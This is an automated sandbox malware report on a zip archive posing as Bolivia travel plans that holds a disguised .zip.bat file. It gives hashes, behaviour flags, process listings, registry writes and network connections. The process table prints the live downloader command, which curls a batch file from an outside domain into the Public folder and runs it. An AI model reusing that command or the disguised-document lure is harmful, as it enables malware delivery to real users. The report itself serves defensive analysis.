| File name: | Travel and tour Bolivia Plans 15-12-2023(2) - .zip |
| Full analysis: | https://app.any.run/tasks/a6fd112d-7b0c-4913-bc89-64e6c4befc5d |
| Verdict: | Malicious activity |
| Analysis date: | December 02, 2023, 15:22:10 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Indicators: | |
| MIME: | application/zip |
| File info: | Zip archive data, at least v2.0 to extract |
| MD5: | A26EFF3C1119E6F15F09E24D6D7C06DA |
| SHA1: | 88B7FE0AC943541A63FBCB1C41794988168F81E1 |
| SHA256: | E3591DFEAF6773FDC150A82D5D419697371EA3330BC02622DDE275587179ED2E |
| SSDEEP: | 1536:lvXwV90Jsc+Dk/6R/k9RlF0Ipi4fwAK7VS2Tiv:lvXysF+Q6R/CbqIc4fwAK7U22v |
MALICIOUS
No malicious indicators.SUSPICIOUS
Executing commands from a ".bat" file
- WinRAR.exe (PID: 3060)
- cmd.exe (PID: 3980)
Starts CMD.EXE for commands execution
- WinRAR.exe (PID: 3060)
- cmd.exe (PID: 3980)
Application launched itself
- cmd.exe (PID: 3980)
- Skype.exe (PID: 2892)
Reads the Internet Settings
- Skype.exe (PID: 2892)
Uses REG/REGEDIT.EXE to modify registry
- Skype.exe (PID: 2892)
Detected use of alternative data streams (AltDS)
- Skype.exe (PID: 2892)
INFO
Checks supported languages
- mode.com (PID: 4032)
- pwsh.exe (PID: 3168)
- Skype.exe (PID: 2892)
- Skype.exe (PID: 3792)
- Skype.exe (PID: 1616)
- Skype.exe (PID: 1904)
- Skype.exe (PID: 3364)
- Skype.exe (PID: 680)
- Skype.exe (PID: 3072)
Manual execution by a user
- explorer.exe (PID: 124)
- pwsh.exe (PID: 3168)
- Skype.exe (PID: 2892)
- notepad++.exe (PID: 856)
Reads the computer name
- pwsh.exe (PID: 3168)
- Skype.exe (PID: 2892)
- Skype.exe (PID: 1616)
- Skype.exe (PID: 1904)
- Skype.exe (PID: 680)
- Skype.exe (PID: 3364)
Reads product name
- Skype.exe (PID: 2892)
- Skype.exe (PID: 3364)
Reads Environment values
- Skype.exe (PID: 2892)
- Skype.exe (PID: 3364)
Creates files or folders in the user directory
- Skype.exe (PID: 2892)
- Skype.exe (PID: 3364)
- Skype.exe (PID: 1904)
Reads CPU info
- Skype.exe (PID: 2892)
Process checks computer location settings
- Skype.exe (PID: 2892)
- Skype.exe (PID: 3364)
- Skype.exe (PID: 3072)
Reads the machine GUID from the registry
- Skype.exe (PID: 2892)
Create files in a temporary directory
- Skype.exe (PID: 2892)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
TRiD
| .zip | | | ZIP compressed archive (100) |
|---|
EXIF
ZIP
| ZipRequiredVersion: | 20 |
|---|---|
| ZipBitFlag: | - |
| ZipCompression: | Deflated |
| ZipModifyDate: | 2023:09:18 18:42:16 |
| ZipCRC: | 0x691967df |
| ZipCompressedSize: | 12865 |
| ZipUncompressedSize: | 1780896 |
| ZipFileName: | Travel and tour Bolivia Plans 15-12-2023(2).zip.bat |
Total processes
60
Monitored processes
17
Malicious processes
1
Suspicious processes
2
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 124 | "C:\Windows\explorer.exe" | C:\Windows\explorer.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Explorer Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 680 | "C:\Program Files\Microsoft\Skype for Desktop\Skype.exe" --type=gpu-process --user-data-dir="C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1396 --field-trial-handle=1340,i,16904851402059185163,14648677244060345381,131072 --enable-features=WinUseBrowserSpellChecker,WinUseHybridSpellChecker,WinrtGeolocationImplementation --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2 | C:\Program Files\Microsoft\Skype for Desktop\Skype.exe | — | Skype.exe | |||||||||||
User: admin Company: Skype Technologies S.A. Integrity Level: LOW Description: Skype Exit code: 0 Version: 8.100.0.203 Modules
| |||||||||||||||
| 856 | "C:\Program Files\Notepad++\notepad++.exe" "C:\Users\admin\Desktop\manifest.json" | C:\Program Files\Notepad++\notepad++.exe | explorer.exe | ||||||||||||
User: admin Company: Don HO don.h@free.fr Integrity Level: MEDIUM Description: Notepad++ : a free (GNU) source code editor Exit code: 0 Version: 7.91 Modules
| |||||||||||||||
| 1616 | "C:\Program Files\Microsoft\Skype for Desktop\Skype.exe" --type=gpu-process --user-data-dir="C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1324 --field-trial-handle=1340,i,16904851402059185163,14648677244060345381,131072 --enable-features=WinUseBrowserSpellChecker,WinUseHybridSpellChecker,WinrtGeolocationImplementation --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2 | C:\Program Files\Microsoft\Skype for Desktop\Skype.exe | — | Skype.exe | |||||||||||
User: admin Company: Skype Technologies S.A. Integrity Level: LOW Description: Skype Exit code: 0 Version: 8.100.0.203 Modules
| |||||||||||||||
| 1904 | "C:\Program Files\Microsoft\Skype for Desktop\Skype.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop" --mojo-platform-channel-handle=1544 --field-trial-handle=1340,i,16904851402059185163,14648677244060345381,131072 --enable-features=WinUseBrowserSpellChecker,WinUseHybridSpellChecker,WinrtGeolocationImplementation --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8 | C:\Program Files\Microsoft\Skype for Desktop\Skype.exe | Skype.exe | ||||||||||||
User: admin Company: Skype Technologies S.A. Integrity Level: MEDIUM Description: Skype Exit code: 0 Version: 8.100.0.203 Modules
| |||||||||||||||
| 1924 | cmd /c curl https://sealingshop.click/bat/ld --ssl-no-revoke -o "C:\\Users\\Public\\noneser.bat" | C:\Windows\System32\cmd.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 2624 | cmd /c C:\\Users\\Public\\noneser.bat | C:\Windows\System32\cmd.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 2892 | "C:\Program Files\Microsoft\Skype for Desktop\Skype.exe" --share-file="C:\Users\admin\Desktop\manifest.json" | C:\Program Files\Microsoft\Skype for Desktop\Skype.exe | explorer.exe | ||||||||||||
User: admin Company: Skype Technologies S.A. Integrity Level: MEDIUM Description: Skype Exit code: 0 Version: 8.100.0.203 Modules
| |||||||||||||||
| 3060 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\Travel and tour Bolivia Plans 15-12-2023(2) - .zip" | C:\Program Files\WinRAR\WinRAR.exe | — | explorer.exe | |||||||||||
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Exit code: 0 Version: 5.91.0 Modules
| |||||||||||||||
| 3072 | "C:\Program Files\Microsoft\Skype for Desktop\Skype.exe" --type=renderer --user-data-dir="C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop" --app-user-model-id=Microsoft.Skype.SkypeDesktop --app-path="C:\Program Files\Microsoft\Skype for Desktop\resources\app.asar" --no-sandbox --no-zygote --enable-blink-features --disable-blink-features --autoplay-policy=no-user-gesture-required --disable-background-timer-throttling --ms-disable-indexeddb-transaction-timeout --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2256 --field-trial-handle=1340,i,16904851402059185163,14648677244060345381,131072 --enable-features=WinUseBrowserSpellChecker,WinUseHybridSpellChecker,WinrtGeolocationImplementation --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:1 | C:\Program Files\Microsoft\Skype for Desktop\Skype.exe | — | Skype.exe | |||||||||||
User: admin Company: Skype Technologies S.A. Integrity Level: MEDIUM Description: Skype Exit code: 0 Version: 8.100.0.203 Modules
| |||||||||||||||
Total events
6 837
Read events
6 732
Write events
105
Delete events
0
Modification events
| (PID) Process: | (3060) WinRAR.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\MuiCache\17F\52C64B7E |
| Operation: | write | Name: | LanguageList |
Value: en-US | |||
| (PID) Process: | (3060) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\ArcHistory |
| Operation: | write | Name: | 2 |
Value: C:\Users\admin\Desktop\virtio_ivshmem_master_build.zip | |||
| (PID) Process: | (3060) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\ArcHistory |
| Operation: | write | Name: | 1 |
Value: C:\Users\admin\Desktop\Win7-KB3191566-x86.zip | |||
| (PID) Process: | (3060) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\ArcHistory |
| Operation: | write | Name: | 0 |
Value: C:\Users\admin\Desktop\phacker.zip | |||
| (PID) Process: | (3060) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | name |
Value: 120 | |||
| (PID) Process: | (3060) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | size |
Value: 80 | |||
| (PID) Process: | (3060) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | type |
Value: 120 | |||
| (PID) Process: | (3060) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | mtime |
Value: 100 | |||
| (PID) Process: | (3060) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
| (PID) Process: | (3060) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | IntranetName |
Value: 1 | |||
Executable files
0
Suspicious files
34
Text files
10
Unknown types
0
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 3168 | pwsh.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\e1a648060a327b80.customDestinations-ms~RF219346.TMP | binary | |
MD5:41DA1AA68014288451738698840E5603 | SHA256:9CF9C1DC3F77734DD297ECA9BD2BA5324259DD5DB22F4D8ABEC1E72A21F89A0D | |||
| 3168 | pwsh.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\e1a648060a327b80.customDestinations-ms | binary | |
MD5:A20A86C096ADCB3F2B94729E95AC8359 | SHA256:9B6C50119EFA806C4BD1CD2C2B0A8524F261AA19EC2B882AD52677A2A0ADC273 | |||
| 3168 | pwsh.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\DNS177RCA3Y1NQG3E4U1.temp | binary | |
MD5:A20A86C096ADCB3F2B94729E95AC8359 | SHA256:9B6C50119EFA806C4BD1CD2C2B0A8524F261AA19EC2B882AD52677A2A0ADC273 | |||
| 3168 | pwsh.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_rgp3hrxi.3ev.ps1 | text | |
MD5:A62A5F5416589F7FB4B0F8DF34BAB7D0 | SHA256:A292ED4CBBAB4EF96B4E684F6CF7E9B1CB7693288B8417F7AAEA0E2EA9060DD6 | |||
| 3060 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRa3060.21134\Travel and tour Bolivia Plans 15-12-2023(2).zip.bat | text | |
MD5:E8B29CB6A414498EA1A89BC343A31815 | SHA256:57ED8E5A306024F6CE344AA9465056CCAAD12F19FBF494666C78E0B7FF9CE425 | |||
| 3060 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DIa3060.2650\Travel and tour Bolivia Plans 15-12-2023(2).zip.bat | text | |
MD5:E8B29CB6A414498EA1A89BC343A31815 | SHA256:57ED8E5A306024F6CE344AA9465056CCAAD12F19FBF494666C78E0B7FF9CE425 | |||
| 3364 | Skype.exe | C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\CS_skylib\CS_shared.tmp | binary | |
MD5:99914B932BD37A50B983C5E7C90AE93B | SHA256:44136FA355B3678A1146AD16F7E8649E94FB4FC21FE77E8310C060F61CAAFF8A | |||
| 2892 | Skype.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b916037c1e115fe0.customDestinations-ms | binary | |
MD5:47F942424BF006D023A0B4505A3711AB | SHA256:97CF99F6C785082A0041A08526239159508878AE85837993B4EE4C9AABF5C235 | |||
| 2892 | Skype.exe | C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\GPUCache\data_1 | binary | |
MD5:1C5A4267A663675990A50EAA2678A4CD | SHA256:AD31759BA56047CAA6AA78B87C11FA8F5325A3A3F18B604040B45ACA26462081 | |||
| 3364 | Skype.exe | C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\CS_skylib\CS_shared.conf | binary | |
MD5:99914B932BD37A50B983C5E7C90AE93B | SHA256:44136FA355B3678A1146AD16F7E8649E94FB4FC21FE77E8310C060F61CAAFF8A | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
29
DNS requests
14
Threats
0
HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
2588 | svchost.exe | 239.255.255.250:1900 | — | — | — | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
1080 | svchost.exe | 224.0.0.252:5355 | — | — | — | unknown |
3168 | pwsh.exe | 23.215.122.57:443 | aka.ms | AKAMAI-AS | DE | unknown |
3168 | pwsh.exe | 13.69.106.211:443 | dc.services.visualstudio.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | unknown |
3168 | pwsh.exe | 52.236.186.216:443 | dc.services.visualstudio.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | unknown |
2892 | Skype.exe | 52.113.194.133:443 | get.skype.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | unknown |
2892 | Skype.exe | 13.107.42.16:443 | a.config.skype.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted |
2892 | Skype.exe | 52.178.17.234:443 | pipe.skype.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | unknown |
DNS requests
Domain | IP | Reputation |
|---|---|---|
aka.ms |
| whitelisted |
dns.msftncsi.com |
| shared |
dc.services.visualstudio.com |
| whitelisted |
get.skype.com |
| whitelisted |
a.config.skype.com |
| whitelisted |
pipe.skype.com |
| whitelisted |
redirector.gvt1.com |
| whitelisted |
gateway.bingviz.microsoftapp.net |
| unknown |
login.live.com |
| whitelisted |
b.config.skype.com |
| whitelisted |
Threats
Process | Message |
|---|---|
pwsh.exe | Profiler was prevented from loading notification profiler due to app settings.
Process ID (decimal): 3168. Message ID: [0x2509].
|
Skype.exe | [1202/152640.881:ERROR:filesystem_win.cc(130)] GetFileAttributes C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Crashpad\attachments\3a0ee62b-79ac-4cc3-bbd5-f65252e7a91f: The system cannot find the file specified. (0x2)
|
notepad++.exe | VerifyLibrary: C:\Program Files\Notepad++\SciLexer.dll
|
notepad++.exe | VerifyLibrary: certificate revocation checking is disabled
|
notepad++.exe | ED255D9151912E40DF048A56288E969A8D0DAFA3
|
notepad++.exe | ED255D9151912E40DF048A56288E969A8D0DAFA3
|
notepad++.exe | VerifyLibrary: C:\Program Files\Notepad++\updater\gup.exe
|
notepad++.exe | VerifyLibrary: certificate revocation checking is disabled
|
notepad++.exe | VerifyLibrary: C:\Program Files\Notepad++\plugins\Config\nppPluginList.dll
|
notepad++.exe | VerifyLibrary: certificate revocation checking is disabled
|